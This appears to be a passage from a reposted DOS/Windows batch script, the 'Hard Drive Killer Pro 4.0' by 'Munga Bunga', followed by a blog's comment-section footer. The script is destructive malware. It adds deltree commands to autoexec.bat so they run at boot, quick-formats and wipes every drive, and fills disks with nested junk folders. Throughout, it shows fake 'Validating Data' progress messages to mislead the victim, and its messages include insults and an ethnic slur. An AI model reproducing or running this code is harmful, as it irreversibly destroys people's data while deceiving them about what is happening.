echo cls >>c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a: >nul >>c:autoexec.bat
echo cd >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Welcome to the land of death. Munga Bunga's Multiple Hard Drive Killer version 4.0. >>c:autoexec.bat
echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:autoexec.bat
echo echo 1. To make people aware that security should not be taken for granted. >>c:autoexec.bat
echo echo 2. Love is important, if you have it, truly, don't let go of it like I did! >>c:autoexec.bat
echo echo 3. If you are NOT a vegetarian, then you are a murderer, and I'm glad your HD is dead. >>c:autoexec.bat
echo echo 4. Don't support the following: War, Racism, Drugs and the Liberal Party.>>c:autoexec.bat
echo echo. >>c:autoexec.bat
echo echo Regards, >>c:autoexec.bat
echo echo. >>c:autoexec.bat
echo echo Munga Bunga >>c:autoexec.bat
call attrib +r +h c:autoexec.bat
:makedir
if exist c:temp.bat attrib -r -h c:temp.bat >nul
echo @echo off >c:temp.bat
echo %%1: >>c:temp.bat
echo cd >>c:temp.bat
echo :startmd >>c:temp.bat
echo for %%%%a in ("if not exist %%2nul md %%2" "if exist %%2nul cd %%2") do %%%%a >>c:temp.bat
echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$hole!!!! >>c:temp.bat
echo if not exist %%1:%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2nul goto startmd >>c:temp.bat
call attrib +r +h c:temp.bat >nul
cls
echo Initializing Variables . . .
rem deltree /y %%a:*. only eliminates directories, hence leaving the file created above for further destruction.
for %%a in (%drive%) do call format %%a: /q /u /autoSample >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
for %%a in (%drive%) do call c:temp.bat %%a Munga >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
for %%a in (%drive%) call attrib -r -h %%a: /S >nul
call attrib +r +h c:temp.bat >nul
call attrib +r +h c:autoexec.bat >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .
for %%a in (%drive%) call deltree /y %%a:*. >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .
echo Starting Application . . .
for %%a in (%drive%) do call c:temp.bat %%a Munga >nul
cls
echo Thank you for using a Munga Bunga product.
echo.
echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius.
echo.
echo Here is a joke for you . . .
echo.
echo Q). What's the worst thing about being an egg?
echo A). You only get laid once.
echo.
echo HAHAHAHA, get it? Don't you just love that one?
echo.
echo Regards,
echo.
echo Munga Bunga
:end
rem Hard Drive Killer Pro Version 4.0, enjoy!!!!
rem Author: Munga Bunga - from Australia, the land full of retarded Australian's (help me get out of here).
沒有留言:
張貼留言